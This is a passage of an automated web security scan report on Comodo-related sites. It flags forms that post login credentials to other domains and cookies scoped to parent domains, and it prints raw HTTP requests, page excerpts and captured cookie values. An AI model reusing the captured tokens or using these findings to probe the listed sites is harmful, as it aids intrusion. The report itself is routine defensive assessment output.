Last-Modified: Fri, 05 Nov 2010 21:21:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Comodo Antispam S
...[SNIP]...
<td>
<form name="form1" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="return checkForm(this);" >
<table width="100%" border="0" cellspacing="3" cellpadding="3">
...[SNIP]...

9.6. http://www.comodopartners.com/partner/evssl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/evssl.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

country
e_invalidLoginDetails
ap
referrerURL
entryURL
region
loginName
loginPassword

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.7. http://www.comodopartners.com/partner/partnerdoc.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/partnerdoc.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

country
e_invalidLoginDetails
ap
referrerURL
entryURL
region
loginName
loginPassword

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.8. http://www.comodopartners.com/partner/rootkey.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/rootkey.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

country
e_invalidLoginDetails
ap
referrerURL
entryURL
region
loginName
loginPassword

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.9. http://www.comodopartners.com/partner/trustlogo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/trustlogo.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

country
e_invalidLoginDetails
ap
referrerURL
entryURL
region
loginName
loginPassword

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.10. http://www.contentverification.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

loginName
loginPassword
country
e_invalidLoginDetails
ap
referrerURL
entryURL
region

Request

Response

9.11. http://www.contentverification.com/certs/BoilingSpringsLoginBox.cer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/certs/BoilingSpringsLoginBox.cer

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

SignOnID
Password
Signon

Request

GET /certs/BoilingSpringsLoginBox.cer HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:02 GMT
Content-Type: application/octet-stream
Content-Length: 4387
Last-Modified: Fri, 15 Dec 2006 13:41:46 GMT
Connection: close
Accept-Ranges: bytes

0...0................Klt...O...0. *.H.......0..1.0 ..U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U.
..Comodo CA Limited1-0+..U...$Comodo Content Verification Services0..051220000000
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form1" autocomplete="off">
<table border="0">
...[SNIP]...

9.12. http://www.contentverification.com/logos/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/login.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

name
email
product
Submit
url

Request

GET /logos/login.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/logos/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.13. http://www.contentverification.com/logos/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/login.html

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

SignOnID
Password
Signon

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form2" autocomplete="off">
<table border="0">
...[SNIP]...

9.14. http://www.contentverification.com/logos/logo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/logo.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

name
email
product
Submit
url

Request

GET /logos/logo.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/products/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; currency=USD; region=North%20America; country=US; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:02:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 5985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.15. http://www.contentverification.com/logos/thirdparty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/thirdparty.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

name
email
product
Submit
url

Request

GET /logos/thirdparty.html HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:55 GMT
Content-Type: text/html
Content-Length: 6030
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.16. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.enterprisessl.com
Path:	/ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

contractSignerName
contractSignerEmailAddress
offerCode
isReturningCustomer
isReturningCustomer
loginName
loginPassword
verifyPassword
premium_dns
OFFERVALUE
OFFERVALUE
OFFERVALUE
EV
HP
HG
GB
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
_1_webServerSoftwareID
organizationName
streetAddress1
localityName
stateOrProvinceName
postalCode
postOfficeBox
contractSignerTelephoneNumber
vatNumber
businessCategory
businessCategory
businessCategory
businessCategory
incorporatingAgency
dateofIncorporation
companyNumber
name
contractSignerTitle
emailAddress
telephoneNumber
currency
region
referrerURL
entryURL
ap
iAgreeToTheTsAndCs
Submit

Request

Response

9.17. https://www.enterprisessl.com/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.enterprisessl.com
Path:	/login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

loginName
loginPassword
region
e_invalidLoginDetails
currency

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...

9.18. http://www.keepitsafe.com/corporate_enterprise.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keepitsafe.com
Path:	/corporate_enterprise.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Code
submit

Request

GET /corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 13659
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.19. http://www.keepitsafe.com/solutions.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.keepitsafe.com
Path:	/solutions.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Code
submit

Request

GET /solutions.php HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://www.keepitsafe.com/corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=119704978.709955153.1316366446.1316366446.1316366446.1; __utmb=119704978.1.10.1316366446; __utmc=119704978; __utmz=119704978.1316366446.1.1.utmcsr=j2com|utmccn=enterprise|utmcmd=xsell-referral|utmcct=keepitsafe

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:20:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.20. http://www.trustix.com/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trustix.com
Path:	/login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

loginName
loginPassword
e_invalidLoginDetails

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.21. http://www.trustix.com/support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trustix.com
Path:	/support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

ap
currency
region
errorURL
1_Incidents
1_PPP
1_PPP
1_PPP
1_PPP
1_PPP
forename
surname
emailAddress
organisationName
loginName
loginPassword

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.22. http://www.vengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.23. http://www.vengine.com/corporate/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/about.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.24. http://www.vengine.com/corporate/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/contact.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.25. http://www.vengine.com/products/best_practices.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/best_practices.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.26. http://www.vengine.com/products/features.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/features.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.27. http://www.vengine.com/products/free_tools.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/free_tools.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.28. http://www.vengine.com/products/overview.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/overview.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.29. http://www.vengine.com/products/prove_it.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/prove_it.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.30. http://www.vengine.com/products/tour.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/tour.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.31. http://www.vengine.com/products/vengine/eula.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/eula.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.32. http://www.vengine.com/products/vengine/faq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.33. http://www.vengine.com/products/vengine/first_time.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/first_time.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.34. http://www.vengine.com/products/vengine/help.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/help.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.35. http://www.vengine.com/products/vengine/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.36. http://www.vengine.com/products/vengine/options.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/options.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.37. http://www.vengine.com/products/vengine/requirements.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/requirements.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.38. http://www.vengine.com/products/vengine/setup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/setup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.39. http://www.vengine.com/products/vengine/ssl_feedback.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/ssl_feedback.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.40. http://www.vengine.com/products/vengine/uninstall.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/uninstall.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.41. http://www.vengine.com/sitemap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/sitemap.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.42. http://www.vengine.com/support/faq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.43. http://www.vengine.com/support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

Response

9.44. https://www.vengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.vengine.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

login
password
country
e_invalidLoginDetails
currency
region

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10. Cookie scoped to parent domain previous next
There are 3 instances of this issue:

http://apis.google.com/js/plusone.js
http://id.google.com/verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif
http://www.bizographics.com/collect/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://apis.google.com/js/plusone.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apis.google.com
Path:	/js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.2. http://id.google.com/verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=51=OBRz60dp-DT3RAGbzX_UkT2S5miM5xizmspOAgxE4g=j_IIDIbd7xiwAAO8; expires=Mon, 19-Mar-2012 01:49:33 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

